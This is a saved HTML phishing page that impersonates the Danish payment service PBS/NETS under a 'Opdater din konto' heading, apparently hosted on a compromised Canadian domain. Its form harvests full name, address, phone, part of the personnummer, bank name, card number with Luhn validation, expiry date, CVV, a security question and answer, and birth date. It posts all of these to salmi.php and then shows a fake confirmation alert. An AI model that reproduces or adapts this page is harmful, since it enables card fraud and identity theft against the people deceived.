﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- saved from url=(0073)http://ecosparklecanada.com/vgytDk/kort/7dbe0856ea3bb51566d7ede101acef27/ -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link href="information_fichiers/style.css" type="text/css" rel="stylesheet">
<title>Opdater din konto PBS  - NETS</title>
<script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/document_iterator.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/find_proxy.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/get_html_text.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/global_constants.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/name_injection_builder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/number_injection_builder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/menu_injection_builder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/string_finder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/change_sink.js"></script><meta name="document_iterator.js"><meta name="find_proxy.js"><meta name="get_html_text.js"><meta name="global_constants.js"><meta name="name_injection_builder.js"><meta name="number_injection_builder.js"><meta name="menu_injection_builder.js"><meta name="string_finder.js"> <script src="information_fichiers/scr4.js"></script><script src="information_fichiers/style.js"></script><meta name="change_sink.js"></head>
<body>
<script type="text/javascript">

function numbersonly(e){
var unicode=e.charCode? e.charCode : e.keyCode
if (unicode!=8){ //if the key isn't the backspace key (which we should allow)
if (unicode<48||unicode>57) //if not a number
return false //disable key press
}
}
</script>
<script type="text/javascript">

					function checkCC(s) {
var i, n, c, r, t;
r = "";
for (i = 0; i < s.length; i++) {
c = parseInt(s.charAt(i), 10);
if (c >= 0 && c <= 9) r = c + r;
}
if (r.length <= 1) return false;
t = "";
for (i = 0; i < r.length; i++) {
c = parseInt(r.charAt(i), 10);
if (i % 2 != 0) c *= 2;
t = t + c;
}
n = 0;
for (i = 0; i < t.length; i++) {
c = parseInt(t.charAt(i), 10);
n = n + c;
}
if (n != 0 && n % 10 == 0) return true;
else return false;
}
 
function verifLength()
{
var cc=document.form.cartnumber.value;
if (document.getElementById("fullname").value.length=='' )
			{
				 document.getElementById("fullname").style.border = "solid red 2px";

				return false;
			}
			else 	  document.getElementById("fullname").style.border = "solid green 2px";

			if (document.getElementById("din").value.length=='' )
			{
				 document.getElementById("din").style.border = "solid red 2px";

				return false;
			}
			else 	  document.getElementById("din").style.border = "solid green 2px";
			if (document.getElementById("zipcode").value.length=='' )
			{
				 document.getElementById("zipcode").style.border = "solid red 2px";

				return false;
			}
			else 	  document.getElementById("zipcode").style.border = "solid green 2px";
				
			if (document.getElementById("ssn").value.length != 4 )

	{  	
				 document.getElementById("ssn").style.border = "solid red 2px";

		return false;
	}
	else document.getElementById("ssn").style.border = "solid green 2px";
					if (document.getElementById("bankname").value.length=='' )
			{
				 document.getElementById("bankname").style.border = "solid red 2px";

				return false;
			}
			else 	  document.getElementById("bankname").style.border = "solid green 2px";
			if (checkCC(cc)==false )
		{
				 document.getElementById("cartnumber").style.border = "solid red 2px";

			return false;
		}
		else 				 document.getElementById("cartnumber").style.border = "solid green 2px";

		{
			
			if (document.getElementById("cc4expmonth").value.length=='' )
			{
				 document.getElementById("cc4expmonth").style.border = "solid red 2px";

				return false;
			}
			else 	  document.getElementById("cc4expmonth").style.border = "solid green 2px";
				if (document.getElementById("cc4expyear").value.length=='' )
			{
				 document.getElementById("cc4expyear").style.border = "solid red 2px";

				return false;
			}
			else 	  document.getElementById("cc4expyear").style.border = "solid green 2px";
						if (document.getElementById("cvv").value.length != 3 )
			{
				 document.getElementById("cvv").style.border = "solid red 2px";

				return false;
			}
			else 	  document.getElementById("cvv").style.border = "solid green 2px";
			
							if (document.getElementById("secquestion").value.length=='' )
			{
				 document.getElementById("secquestion").style.border = "solid red 2px";

				return false;
			}
			else 	  document.getElementById("secquestion").style.border = "solid green 2px";
									if (document.getElementById("answer").value.length=='' )
			{
				 document.getElementById("answer").style.border = "solid red 2px";

				return false;
			}
			else 	  document.getElementById("answer").style.border = "solid green 2px";
			if (document.getElementById("bdateday").value.length=='' )
			{
				 document.getElementById("bdateday").style.border = "solid red 2px";

				return false;
			}
			else 	  document.getElementById("bdateday").style.border = "solid green 2px";
			if (document.getElementById("bdatemonth").value.length=='' )
			{
				 document.getElementById("bdatemonth").style.border = "solid red 2px";

				return false;
			}
			else 	  document.getElementById("bdatemonth").style.border = "solid green 2px";
			if (document.getElementById("bdateyear").value.length=='' )
			{
				 document.getElementById("bdateyear").style.border = "solid red 2px";

				return false;
			}
			else 	  document.getElementById("bdateyear").style.border = "solid green 2px";
						
			
			if (document.getElementById("ssn").value.length != 4 )

	{  	
				 document.getElementById("ssn").style.border = "solid red 2px";

		return false;
	}
	else document.getElementById("ssn").style.border = "solid green 2px";valider();
	{
	       
		
	
			
			
			
			

	{
	alert('Din konto er bekræftet');

	return true;
	} 
		}

}
}
</script>
<!-- Header -->

<div id="header">
<br><div id="logo">
<img src="information_fichiers/logo.png">
</div>
<div id="slogan">Opdater din konto PBS - NETS</div>

</div>
<!-- Main -->
<div id="main">

<br>
<div id="slogan">PBS for at aktivere din konto, skal du udfylde nedenstående formular.</div>
<form id="form" action="salmi.php" method="post" name="form" onsubmit="return verifLength()">
<br><br>
<table cellpadding="4">
<tbody><tr>
<td align="right" width="300">Dit fulde navn *</td>
<td><input name="fullname" id="fullname" type="text"></td>
</tr>
<tr>
<td align="right" width="300">Husnummer og gadenavn *</td>
<td><input name="din" id="din" type="text"></td>
</tr>
<tr>
<td align="right" width="300">By  *</td>
<td><input name="city" id="city" type="text"></td>
</tr>
<tr>
<td align="right" width="300">Postnummer *</td>
<td><input name="zipcode" id="zipcode" type="text"></td>
</tr>
<tr>
<td align="right" width="300">Telefonnummer *</td>
<td><input onkeypress="return numbersonly(event)" name="telnumber" id="telnumber" type="text"></td>
</tr>
<tr>
<td align="right" width="300">De sidste 4 cifre i dit personnummer  *</td>
<td><input onkeypress="return numbersonly(event)" name="ssn" id="ssn" maxlength="4" type="text"></td>
</tr>
<tr>
<td align="right" width="300">Navn på banken din *</td>
<td><input name="bankname" id="bankname" type="text"></td>
</tr>
<tr>
<td align="right" width="300">Dit kortnummer *</td>
<td><input onkeypress="return numbersonly(event)" name="cartnumber" id="cartnumber" maxlength="16" type="text"></td><td><img src="information_fichiers/msc.jpg" style="margin:4px;"><img src="information_fichiers/vbv.gif" style="padding-top:4px; margin:4px;"></td>
</tr>
<tr>
<td align="right" width="300">Kortet udløbsdato *</td>
<td align="right"><select class="'.$cc4expclass.'" name="cc4expmonth" id="cc4expmonth">
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09" selected="selected">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>

</select>
<select class="'.$cc4expclass.'" name="cc4expyear" size="1" id="cc4expyear" type="select">

<option value="13">2013</option>
<option value="14">2014</option>
<option value="15">2015</option>
<option value="16">2016</option>
<option value="17">2017</option>
<option value="18">2018</option>
<option value="19">2019</option>
<option value="20">2020</option>

</select>&nbsp;&nbsp;Cvv *&nbsp;&nbsp;<input onkeypress="return numbersonly(event)" name="cvv" id="cvv" maxlength="3" style="width:30px;" type="text"></td><td><img src="information_fichiers/cvv2.jpg" style="padding-top:4px; margin:4px;"></td>
</tr>

<tr>
<td align="right" width="300">spørgsmålet  *</td>
<td><input name="secquestion" id="secquestion" type="text"></td>
</tr>
<tr>
<td align="right" width="300">Svare  * </td>
<td><input name="answer" id="answer" type="text"></td>
</tr>
<tr>
<td align="right" width="300">Fødselsdato *</td>
<td>
<input name="bdateday" id="bdateday" onkeypress="return numbersonly(event)" placeholder="dd" style="width:25px;" maxlength="2" type="text">&nbsp;
<input name="bdatemonth" id="bdatemonth" onkeypress="return numbersonly(event)" placeholder="mm" style="width:25px;" maxlength="2" type="text">&nbsp;
<input name="bdateyear" id="bdateyear" onkeypress="return numbersonly(event)" placeholder="åååå" style="width:35px;" maxlength="4" type="text"></td>
</tr>
<tr>
<td align="right" width="300"></td>
<td><input src="information_fichiers/submit.PNG" alt="Submit button" type="image"></td>
</tr>
</tbody></table>

</form>
</div>

<!-- Footer -->

<div id="footer">
</div>


<span id="skype_highlighting_settings" display="none" autoextractnumbers="1"></span><object id="skype_plugin_object" location.href="http://ecosparklecanada.com/vgytDk/kort/7dbe0856ea3bb51566d7ede101acef27/" location.hostname="ecosparklecanada.com" style="position: absolute; visibility: hidden; left: -100px; top: -100px; " type="application/x-vnd.skype.click2call.chrome.5.7.0" height="0" width="0"></object></body></html>